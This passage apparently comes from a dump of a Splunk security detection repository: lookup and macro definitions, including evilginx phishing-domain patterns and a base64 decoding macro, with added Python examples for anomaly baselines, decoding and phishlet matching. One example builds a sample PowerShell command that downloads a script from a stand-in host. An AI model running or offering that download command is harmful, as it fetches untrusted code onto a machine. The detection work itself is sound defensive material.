author: Bhavin Patel, Nasreddine Bencherchali, Splunk
lookup_type: csv
description: A list of threats and the number of distinct Snort IDs that must fire before an alert is created
min_matches: 1
--------------------------------------------------------------------------------
/lookups/windows_protocol_handlers.yml:
--------------------------------------------------------------------------------
name: windows_protocol_handlers
date: 2024-12-23
version: 2
id: d7a6399f-9f59-4d16-a637-3353e6d4e3d1
author: Splunk Threat Research Team
lookup_type: csv
description: A list of Windows protocol handlers
match_type:
  - WILDCARD(handler)
min_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/windows_suspicious_services.yml:
--------------------------------------------------------------------------------
name: windows_suspicious_services
date: 2025-03-26
version: 2
id: 8c214005-2b4e-49c8-bba6-747005f11296
author: Steven Dick
lookup_type: csv
description: A list of suspicious Windows service names and locations
match_type:
  - WILDCARD(service_name)
  - WILDCARD(service_path)
min_matches: 1
max_matches: 1
case_sensitive_match: false
--------------------------------------------------------------------------------
/lookups/windows_suspicious_tasks.yml:
--------------------------------------------------------------------------------
name: windows_suspicious_tasks
date: 2025-02-07
version: 1
id: 928cba69-be80-4601-9b0d-3ec81f714338
author: Steven Dick
lookup_type: csv
description: A list of suspicious Windows scheduled task names and locations
match_type:
  - WILDCARD(task_name)
  - WILDCARD(task_command)
  - WILDCARD(task_arguments)
min_matches: 1
max_matches: 1
case_sensitive_match: false
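Several of the lookups above share one record shape: network_acl_activity_baseline, s3_deletion_baseline and security_group_activity_baseline store latestCount, numDataPoints, avgApiCalls and stdevApiCalls per ARN, and the k8s_* baselines store avg/stdev pairs with a count per container. The Python below is an added example, not the project's own baseline or detection search (neither is on this page). It builds that record from constructed hourly event buckets and then scores the latest bucket against mean plus k standard deviations. Two design choices are assumptions of this example rather than something the page states: the bucket being scored is excluded from its own history, and a row is only scored once it has min_points history buckets.

```python
import statistics
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed sample data: hourly counts of "API calls" per ARN, expanded into
# (bucket, arn) events so the code below has something to aggregate. Not real
# CloudTrail data. The last bucket of each ARN is the one a detection would score.
_COUNTS_PER_HOUR = {
    "arn:aws:iam::111122223333:user/alice": [2, 3, 2, 3, 2, 3, 2, 40],   # spike in the last hour
    "arn:aws:iam::111122223333:role/deploy": [10, 12, 11, 9, 10, 11, 12, 13],
    "arn:aws:iam::111122223333:user/bob": [1, 7],                        # too little history
}
SAMPLE_EVENTS: List[Tuple[str, str]] = []
for _arn, _counts in _COUNTS_PER_HOUR.items():
    for _hour, _n in enumerate(_counts):
        SAMPLE_EVENTS += [(f"2024-12-01T{_hour:02d}", _arn)] * _n


def build_baseline(events: List[Tuple[str, str]]) -> Dict[str, Dict[str, float]]:
    """Aggregate events into one baseline row per ARN, keyed the way a KV store
    row would be keyed (_key = arn). Mirrors the field names on this page."""
    per_arn: Dict[str, Counter] = defaultdict(Counter)
    for bucket, arn in events:
        per_arn[arn][bucket] += 1
    baseline = {}
    for arn, buckets in per_arn.items():
        # Only buckets with at least one event exist, exactly as `stats count by _time`
        # would produce them; silent hours never contribute a zero (see note below).
        counts = [buckets[b] for b in sorted(buckets)]
        history, latest = counts[:-1], counts[-1]      # assumption: score the latest bucket against the rest
        baseline[arn] = {
            "latestCount": latest,
            "numDataPoints": len(history),
            "avgApiCalls": statistics.mean(history) if history else 0.0,
            # sample stdev needs two points; report 0.0 below that so the row stays well-formed
            "stdevApiCalls": statistics.stdev(history) if len(history) > 1 else 0.0,
        }
    return baseline


def find_outliers(baseline: Dict[str, Dict[str, float]], k: float = 3.0,
                  min_points: int = 5) -> List[Tuple[str, int, float]]:
    """Return (arn, latestCount, threshold) for every ARN whose latest bucket exceeds
    avg + k * stdev. Rows with fewer than min_points history buckets are skipped: with
    one or two points the stdev is 0 or meaningless and every deviation would alert."""
    flagged = []
    for arn, row in baseline.items():
        if row["numDataPoints"] < min_points:
            continue
        threshold = row["avgApiCalls"] + k * row["stdevApiCalls"]
        if row["latestCount"] > threshold:
            flagged.append((arn, int(row["latestCount"]), round(threshold, 2)))
    return flagged


if __name__ == "__main__":
    rows = build_baseline(SAMPLE_EVENTS)
    for arn, row in rows.items():
        print(arn, row)
    for arn, latest, threshold in find_outliers(rows):
        print(f"OUTLIER {arn}: latestCount={latest} threshold={threshold}")
```

Two caveats carry over to the real searches. First, a per-bucket count only produces rows for buckets that had events, so an ARN that is idle most of the day has a history made of busy hours only and an average biased upward; if quiet hours matter, fill them with zeros before computing the statistics. Second, if the scored bucket is included in its own history (as a single `stats latest() avg() stdev()` pass would do), a large spike raises both the mean and the stdev and can push its own threshold above itself; in the sample data alice's 40 calls would not trip a 3-sigma threshold computed that way, but do trip it against the seven-hour history alone.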
--------------------------------------------------------------------------------
/lookups/zoom_first_time_child_process.yml:
--------------------------------------------------------------------------------
name: zoom_first_time_child_process
date: 2024-12-23
version: 2
id: f5c154e3-b6d8-419c-aff6-863d5e7fd6e5
author: Splunk Threat Research Team
lookup_type: kvstore
description: A table of child processes previously seen spawned by Zoom on each host, with the first and last time they were observed
fields:
  - _key
  - dest
  - process_name
  - firstTimeSeen
  - lastTimeSeen
--------------------------------------------------------------------------------
/macros/admon.yml:
--------------------------------------------------------------------------------
definition: source=ActiveDirectory
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: admon
--------------------------------------------------------------------------------
/macros/amazon_security_lake.yml:
--------------------------------------------------------------------------------
definition: sourcetype=aws:asl
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: amazon_security_lake
--------------------------------------------------------------------------------
/macros/appdynamics_security.yml:
--------------------------------------------------------------------------------
definition: sourcetype=appdynamics_security
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: appdynamics_security
--------------------------------------------------------------------------------
/macros/aws_cloudwatchlogs_eks.yml:
--------------------------------------------------------------------------------
definition: sourcetype="aws:cloudwatchlogs:eks"
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_cloudwatchlogs_eks
--------------------------------------------------------------------------------
/macros/aws_config.yml:
--------------------------------------------------------------------------------
definition: sourcetype=aws:config
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_config
--------------------------------------------------------------------------------
/macros/aws_description.yml:
--------------------------------------------------------------------------------
definition: sourcetype="aws:description"
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_description
--------------------------------------------------------------------------------
/macros/aws_ecr_users.yml:
--------------------------------------------------------------------------------
definition: userName IN (user)
description: Specify the users allowed to push images to AWS ECR.
name: aws_ecr_users
--------------------------------------------------------------------------------
/macros/aws_ecr_users_asl.yml:
--------------------------------------------------------------------------------
definition: actor.user.name IN (admin)
description: Specify the users allowed to push images to AWS ECR.
name: aws_ecr_users_asl
--------------------------------------------------------------------------------
/macros/aws_s3_accesslogs.yml:
--------------------------------------------------------------------------------
definition: sourcetype=aws:s3:accesslogs
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_s3_accesslogs
--------------------------------------------------------------------------------
/macros/aws_securityhub_finding.yml:
--------------------------------------------------------------------------------
definition: sourcetype="aws:securityhub:finding"
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_securityhub_finding
--------------------------------------------------------------------------------
/macros/aws_securityhub_firehose.yml:
--------------------------------------------------------------------------------
definition: sourcetype="aws:securityhub:firehose"
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
name: aws_securityhub_firehose
--------------------------------------------------------------------------------
/macros/azure_audit.yml:
--------------------------------------------------------------------------------
definition: sourcetype=mscs:azure:audit
description: Customer-specific Splunk configuration (e.g. index, source, sourcetype).
  Replace the macro definition with the configuration for your Splunk environment.
4 | name: azure_audit 5 | -------------------------------------------------------------------------------- /macros/azure_monitor_aad.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=azure:monitor:aad 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: azure_monitor_aad 5 | -------------------------------------------------------------------------------- /macros/azure_monitor_activity.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=azure:monitor:activity 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: azure_monitor_activity -------------------------------------------------------------------------------- /macros/azuread.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=mscs:azure:eventhub 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: azuread 5 | -------------------------------------------------------------------------------- /macros/base64decode.yml: -------------------------------------------------------------------------------- 1 | arguments: 2 | - b64in 3 | definition: 'eval b64x_split=split($b64in$,"") 4 | | lookup char_conversion_matrix base64char as b64x_split OUTPUT base64bin as b64x_bin 5 | | eval b64x_join=mvjoin(b64x_bin,"") 6 | | rex field=b64x_join "(?<b64x_by8>.{8})" max_match=0 7 | | lookup char_conversion_matrix bin as b64x_by8 output ascii as b64x_out 8 | | eval $b64in$_decode=mvjoin(b64x_out,"") 9 | | fields - b64x_* 10 | | eval $b64in$_decode = replace(replace($b64in$_decode,":NUL:",""),":SPACE:"," ") 11 | | rex field=$b64in$_decode mode=sed "s/\x00//g"' 12 | description: Content-based decoding of UTF-8/UTF-16 base64-encoded strings. Not a full implementation, but good enough for context without installing an additional app. 13 | name: base64decode -------------------------------------------------------------------------------- /macros/bootloader_inventory.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype = PwSh:bootloader 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: bootloader_inventory -------------------------------------------------------------------------------- /macros/brand_abuse_dns.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true brandMonitoring_lookup domain as query OUTPUT domain_abuse 2 | | search domain_abuse=true 3 | description: This macro limits the output to only domains that are in the brand monitoring 4 | lookup file 5 | name: brand_abuse_dns 6 | -------------------------------------------------------------------------------- /macros/brand_abuse_email.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true brandMonitoring_lookup domain as src_user OUTPUT domain_abuse 2 | | search domain_abuse=true 3 | description: This macro limits the output to only domains that are in the brand monitoring 4 | lookup file 5 | name: brand_abuse_email 6 | -------------------------------------------------------------------------------- /macros/brand_abuse_web.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true brandMonitoring_lookup domain as urls OUTPUT domain_abuse 2 | | search domain_abuse=true 3 | description: This macro limits the output to only domains that are in the brand monitoring 4 | lookup file 5 | name: brand_abuse_web 6 | -------------------------------------------------------------------------------- /macros/capi2_operational.yml: -------------------------------------------------------------------------------- 1 | definition: (source=XmlWinEventLog:Microsoft-Windows-CAPI2/Operational) 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: capi2_operational -------------------------------------------------------------------------------- /macros/certificateservices_lifecycle.yml: -------------------------------------------------------------------------------- 1 | definition: (source=XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational OR source=XmlWinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational) 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: certificateservices_lifecycle -------------------------------------------------------------------------------- /macros/circleci.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=circleci 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: circleci -------------------------------------------------------------------------------- /macros/cisco_ai_defense.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=cisco:ai:defense 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: cisco_ai_defense 5 | -------------------------------------------------------------------------------- /macros/cisco_networks.yml: -------------------------------------------------------------------------------- 1 | definition: eventtype=cisco_ios 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: cisco_networks 5 | -------------------------------------------------------------------------------- /macros/cisco_secure_firewall.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="cisco:sfw:estreamer" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Cisco Secure Firewall Threat Defense logs. Replace the macro definition with configurations for your Splunk Environment. 3 | name: cisco_secure_firewall 4 | -------------------------------------------------------------------------------- /macros/cisco_secure_firewall_inside_to_outside.yml: -------------------------------------------------------------------------------- 1 | definition: (IngressZone="inside" EgressZone="outside") 2 | description: Replace the macro definition with configurations for your Splunk Environment. IngressZone should represent internal zones and EgressZone should represent the internet or an untrusted zone. 3 | name: cisco_secure_firewall_inside_to_outside 4 | -------------------------------------------------------------------------------- /macros/cloud_api_calls_from_previously_unseen_user_roles_activity_window.yml: -------------------------------------------------------------------------------- 1 | description: Use this macro to determine how far back you should be checking for new commands from user roles 2 | definition: '"-70m@m"' 3 | name: cloud_api_calls_from_previously_unseen_user_roles_activity_window 4 | -------------------------------------------------------------------------------- /macros/cloudtrail.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=aws:cloudtrail 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: cloudtrail 5 | -------------------------------------------------------------------------------- /macros/cloudwatch_eks.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="aws:cloudwatchlogs:eks" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch eks logs. Replace the macro definition with configurations for your Splunk Environment. 3 | name: cloudwatch_eks 4 | -------------------------------------------------------------------------------- /macros/cloudwatch_vpc.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=aws:cloudwatchlogs:vpcflow 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch vpc logs. Replace the macro definition with configurations for your Splunk Environment. 3 | name: cloudwatch_vpc 4 | -------------------------------------------------------------------------------- /macros/cloudwatchlogs_vpcflow.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=aws:cloudwatchlogs:vpcflow 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: cloudwatchlogs_vpcflow 5 | -------------------------------------------------------------------------------- /macros/crowdstrike_identities.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=crowdstrike:identities 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: crowdstrike_identities -------------------------------------------------------------------------------- /macros/crowdstrike_stream.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="CrowdStrike:Event:Streams:JSON" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: crowdstrike_stream -------------------------------------------------------------------------------- /macros/crushftp.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="crushftp:sessionlogs" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: crushftp 5 | -------------------------------------------------------------------------------- /macros/driverinventory.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=PwSh:DriverInventory 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: driverinventory -------------------------------------------------------------------------------- /macros/dynamic_dns_providers.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true dynamic_dns_providers_default dynamic_dns_domains as 2 | query OUTPUTNEW isDynDNS_default | lookup update=true dynamic_dns_providers_local 3 | dynamic_dns_domains as query OUTPUTNEW isDynDNS_local| eval isDynDNS = coalesce(isDynDNS_local,isDynDNS_default) 4 | |fields - isDynDNS_default, isDynDNS_local| search isDynDNS=True 5 | description: This macro limits the output of the query field to dynamic dns domains. 
6 | It looks up the domains in a file provided by Splunk and one intended to be updated 7 | by the end user. 8 | name: dynamic_dns_providers 9 | -------------------------------------------------------------------------------- /macros/dynamic_dns_web_traffic.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true dynamic_dns_providers_default dynamic_dns_domains as 2 | url OUTPUTNEW isDynDNS_default | lookup update=true dynamic_dns_providers_local 3 | dynamic_dns_domains as url OUTPUTNEW isDynDNS_local| eval isDynDNS = coalesce(isDynDNS_default, 4 | isDynDNS_local)|fields - isDynDNS_default, isDynDNS_local| search isDynDNS=True 5 | description: This macro limits the output of the url field to dynamic DNS domains. It looks up the domains in a file provided by Splunk and one intended to be updated by the end user. 6 | name: dynamic_dns_web_traffic 7 | -------------------------------------------------------------------------------- /macros/ec2_modification_api_calls.yml: -------------------------------------------------------------------------------- 1 | definition: (eventName=AssociateAddress OR eventName=AssociateIamInstanceProfile OR 2 | eventName=AttachClassicLinkVpc OR eventName=AttachNetworkInterface OR eventName=AttachVolume 3 | OR eventName=BundleInstance OR eventName=DetachClassicLinkVpc OR eventName=DetachVolume 4 | OR eventName=ModifyInstanceAttribute OR eventName=ModifyInstancePlacement 5 | OR eventName=MonitorInstances OR eventName=RebootInstances 6 | OR eventName=ResetInstanceAttribute OR eventName=StartInstances OR eventName=StopInstances 7 | OR eventName=TerminateInstances OR eventName=UnmonitorInstances) 8 | description: This is a list of AWS event names that have to do with modifying Amazon 9 | EC2 instances 10 | name: ec2_modification_api_calls 11 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_0365.yml: -------------------------------------------------------------------------------- 1 | definition: (query=login* AND query=www*) 2 | description: This limits the query 
fields to domains that are associated with evilginx 3 | masquerading as Office 365 4 | name: evilginx_phishlets_0365 5 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_amazon.yml: -------------------------------------------------------------------------------- 1 | definition: (query=fls-na* AND query = www* AND query=images*) 2 | description: This limits the query fields to domains that are associated with evilginx 3 | masquerading as Amazon 4 | name: evilginx_phishlets_amazon 5 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_aws.yml: -------------------------------------------------------------------------------- 1 | definition: (query=www* AND query=aws* AND query=console.aws* AND query=signin.aws* 2 | AND query=api-northeast-1.console.aws* AND query=fls-na* AND query=images-na*) 3 | description: This limits the query fields to domains that are associated with evilginx 4 | masquerading as an AWS console 5 | name: evilginx_phishlets_aws 6 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_facebook.yml: -------------------------------------------------------------------------------- 1 | definition: (query=www* AND query = m* AND query=static*) 2 | description: This limits the query fields to domains that are associated with evilginx 3 | masquerading as Facebook 4 | name: evilginx_phishlets_facebook 5 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_github.yml: -------------------------------------------------------------------------------- 1 | definition: (query=api* AND query = github*) 2 | description: This limits the query fields to domains that are associated with evilginx 3 | masquerading as GitHub 4 | name: evilginx_phishlets_github 5 | -------------------------------------------------------------------------------- 
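The base64decode macro above decodes without the standard library: it maps each base64 character to its 6-bit value through the char_conversion_matrix lookup, concatenates the bits, regroups them into 8-bit chunks, maps those back to bytes, and finally deletes NUL bytes so that UTF-16LE payloads (the encoding PowerShell's -EncodedCommand uses) come out readable. The following Python is an added example, not code from the security_content project, that implements the same bit-level algorithm so the macro's behaviour, and the NUL-stripping shortcut, can be checked against a known-good decoder. The sample command string is constructed here; it is not a captured artifact.

```python
import base64
import re

# Base64 alphabet -> 6-bit string. This plays the role of the
# char_conversion_matrix lookup (base64char -> base64bin) in the macro.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
CHAR_TO_BITS = {c: format(i, "06b") for i, c in enumerate(B64_ALPHABET)}


def decode_bitwise(b64: str) -> bytes:
    """Decode base64 the way the SPL macro does.

    Each character is mapped to its 6-bit value, the bits are concatenated,
    regrouped into 8-bit chunks (the macro's rex "(?<b64x_by8>.{8})"), and each
    chunk becomes one byte. Padding '=' and any character outside the alphabet
    contribute no bits, and a trailing partial chunk is dropped, which is why
    padding needs no special handling here.
    """
    bits = "".join(CHAR_TO_BITS.get(c, "") for c in b64)
    octets = re.findall(r".{8}", bits)
    return bytes(int(o, 2) for o in octets)


def to_text(raw: bytes) -> str:
    """Turn decoded bytes into text.

    The macro finishes with sed "s/\\x00//g", which makes UTF-16LE content
    readable by deleting every NUL byte. That shortcut also silently mangles
    genuine binary data, so this version decodes UTF-16LE explicitly when the
    byte pattern looks like it and only falls back to NUL stripping otherwise.
    """
    if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1] == 0:
        try:
            return raw.decode("utf-16-le")
        except UnicodeDecodeError:
            pass
    return raw.replace(b"\x00", b"").decode("latin-1")


def decode_encoded_command(b64: str) -> str:
    """Full pipeline: bit-level base64 decode, then text recovery."""
    return to_text(decode_bitwise(b64))


# Constructed sample: the kind of value seen in a PowerShell -EncodedCommand
# argument. It is generated here, not captured from a real host.
SAMPLE_CMD = "Invoke-WebRequest http://example.invalid/a.ps1 -OutFile a.ps1"
SAMPLE_ENC = base64.b64encode(SAMPLE_CMD.encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    print("encoded :", SAMPLE_ENC)
    print("bytes   :", decode_bitwise(SAMPLE_ENC)[:16], "...")
    print("decoded :", decode_encoded_command(SAMPLE_ENC))
    # Cross-check the bit-level decoder against the standard library.
    assert decode_bitwise(SAMPLE_ENC) == base64.b64decode(SAMPLE_ENC)
```

Two properties carry over to the macro: unpadded or whitespace-containing input still decodes because unknown characters contribute no bits, and anything that is not ASCII in UTF-8 or UTF-16LE will come out garbled, which is the "not a full implementation" caveat in the macro description.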
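The evilginx_phishlets_* macros (the ones above plus the google and outlook ones that follow) each AND several query=prefix* wildcards together. A single DNS event has one query value, so these can only all be true once the queries for a domain have been collected into a multivalued field; the assumption in the added example below is that the macros are evaluated over the set of queries seen per registrable domain. This Python is not code from the security_content project; the DNS log lines are constructed, and the two-label registrable-domain heuristic is a simplification a real pipeline would replace with a public suffix list.

```python
import re
from fnmatch import fnmatchcase

# Subdomain prefix patterns taken from the evilginx_phishlets_* macros
# (the query=... wildcards, one list per impersonated brand).
PHISHLETS = {
    "o365": ["login*", "www*"],
    "amazon": ["fls-na*", "www*", "images*"],
    "aws": ["www*", "aws*", "console.aws*", "signin.aws*",
            "api-northeast-1.console.aws*", "fls-na*", "images-na*"],
    "facebook": ["www*", "m*", "static*"],
    "github": ["api*", "github*"],
    "google": ["accounts*", "ssl*", "www*"],
    "outlook": ["outlook*", "login*", "account*"],
}

# Constructed DNS log lines (not real traffic). The first host resolves the
# two subdomains an evilginx O365 phishlet serves on its phishing domain.
DNS_LOG = """\
2024-06-01T10:00:01Z src=10.0.0.5 query=www.contoso-login.example
2024-06-01T10:00:02Z src=10.0.0.5 query=login.contoso-login.example
2024-06-01T10:00:03Z src=10.0.0.7 query=www.example.org
2024-06-01T10:00:04Z src=10.0.0.7 query=mail.example.org
2024-06-01T10:00:05Z src=10.0.0.9 query=api.gh-support.example
2024-06-01T10:00:06Z src=10.0.0.9 query=GitHub.gh-support.example
"""


def registrable_domain(fqdn: str) -> str:
    """Last two labels. Good enough for the sample; real data needs a public
    suffix list so that e.g. login.x.co.uk groups under x.co.uk."""
    return ".".join(fqdn.lower().rstrip(".").split(".")[-2:])


def queries_by_domain(log: str) -> dict:
    """Group the query field by registrable domain, the way a
    `stats values(query) as query by domain` step would."""
    grouped = {}
    for m in re.finditer(r"\bquery=(\S+)", log):
        fqdn = m.group(1).lower()
        grouped.setdefault(registrable_domain(fqdn), set()).add(fqdn)
    return grouped


def matching_phishlets(queries: set) -> list:
    """A phishlet matches when every one of its prefix patterns matches at
    least one query for the domain (the macro's AND over a multivalued field).
    Splunk wildcard search is case-insensitive, so compare in lower case."""
    hits = []
    for name, patterns in PHISHLETS.items():
        if all(any(fnmatchcase(q, p.lower()) for q in queries) for p in patterns):
            hits.append(name)
    return hits


def detect(log: str) -> dict:
    """Map each domain to the phishlets whose subdomain set it reproduces."""
    result = {}
    for domain, queries in queries_by_domain(log).items():
        hits = matching_phishlets(queries)
        if hits:
            result[domain] = hits
    return result


if __name__ == "__main__":
    for domain, hits in detect(DNS_LOG).items():
        print(f"{domain}: subdomain set matches evilginx phishlet(s) {hits}")
```

Note how example.org is not flagged even though www and mail satisfy two of the three facebook prefixes: the AND is over all prefixes. Even so, www plus login is common on legitimate domains, so these macros narrow a candidate set rather than convict a domain; pairing the result with domain age or a first-seen lookup is what keeps the alert volume manageable.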
/macros/evilginx_phishlets_google.yml: -------------------------------------------------------------------------------- 1 | definition: (query=accounts* AND query=ssl* AND query=www*) 2 | description: This limits the query fields to domains that are associated with evilginx 3 | masquerading as Google 4 | name: evilginx_phishlets_google 5 | -------------------------------------------------------------------------------- /macros/evilginx_phishlets_outlook.yml: -------------------------------------------------------------------------------- 1 | definition: (query=outlook* AND query=login* AND query=account*) 2 | description: This limits the query fields to domains that are associated with evilginx 3 | masquerading as Outlook 4 | name: evilginx_phishlets_outlook 5 | -------------------------------------------------------------------------------- /macros/f5_bigip_rogue.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="f5:bigip:rogue" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: f5_bigip_rogue -------------------------------------------------------------------------------- /macros/fillnull_config.yml: -------------------------------------------------------------------------------- 1 | definition: "null" 2 | description: Used inside security_content_summariesonly to adjust the fillnull configuration 3 | name: fillnull_config 4 | -------------------------------------------------------------------------------- /macros/filter_rare_process_allow_list.yml: -------------------------------------------------------------------------------- 1 | definition: lookup update=true lookup_rare_process_allow_list_default process as process 2 | OUTPUTNEW allow_list | where allow_list="false" | lookup update=true lookup_rare_process_allow_list_local 3 | process as process OUTPUT allow_list | where allow_list="false" 4 | description: This macro filters out processes that are on the rare-process allow list (the default lookup and a local one maintained by the end user), keeping only 5 | processes with allow_list="false" 6 | name: filter_rare_process_allow_list 7 | -------------------------------------------------------------------------------- /macros/github.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=aws:firehose:json 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: github -------------------------------------------------------------------------------- /macros/github_enterprise.yml: -------------------------------------------------------------------------------- 1 | definition: source=http:github sourcetype=httpevent 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: github_enterprise -------------------------------------------------------------------------------- /macros/github_known_users.yml: -------------------------------------------------------------------------------- 1 | definition: user IN (user_names_here) 2 | description: specify the user allowed to create PRs in Github projects. 3 | name: github_known_users 4 | -------------------------------------------------------------------------------- /macros/github_organizations.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=github:cloud:audit 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: github_organizations -------------------------------------------------------------------------------- /macros/google_gcp_pubnet_message.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="google:gcp:pubsub:message" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for Google GCP. Replace the macro definition with configurations for your Splunk Environment. 3 | name: google_gcp_pubnet_message 4 | -------------------------------------------------------------------------------- /macros/google_gcp_pubsub_message.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype="google:gcp:pubsub:message" 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 
4 | name: google_gcp_pubsub_message 5 | -------------------------------------------------------------------------------- /macros/gsuite_calendar.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=gsuite:calendar:json 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: gsuite_calendar 5 | 6 | -------------------------------------------------------------------------------- /macros/gsuite_drive.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=gsuite:drive:json 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: gsuite_drive 5 | 6 | -------------------------------------------------------------------------------- /macros/gsuite_gmail.yml: -------------------------------------------------------------------------------- 1 | definition: sourcetype=gsuite:gmail:bigquery 2 | description: customer specific splunk configurations(eg- index, source, sourcetype). 3 | Replace the macro definition with configurations for your Splunk Environment. 4 | name: gsuite_gmail -------------------------------------------------------------------------------- /macros/gws_login_mfa_methods.yml: -------------------------------------------------------------------------------- 1 | definition: event.parameters{}.multiValue{} IN ("backup_code", "google_authenticator", "google_prompt", "idv_any_phone", "idv_preregistered_phone", "internal_two_factor", "knowledge_employee_id", "knowledge_preregistered_email", "login_location", "knowledge_preregistered_phone", "offline_otp", "security_key", "security_key_otp") 2 | description: A list of Google Workspace login verification (MFA) method values as reported in event.parameters{}.multiValue{}. 
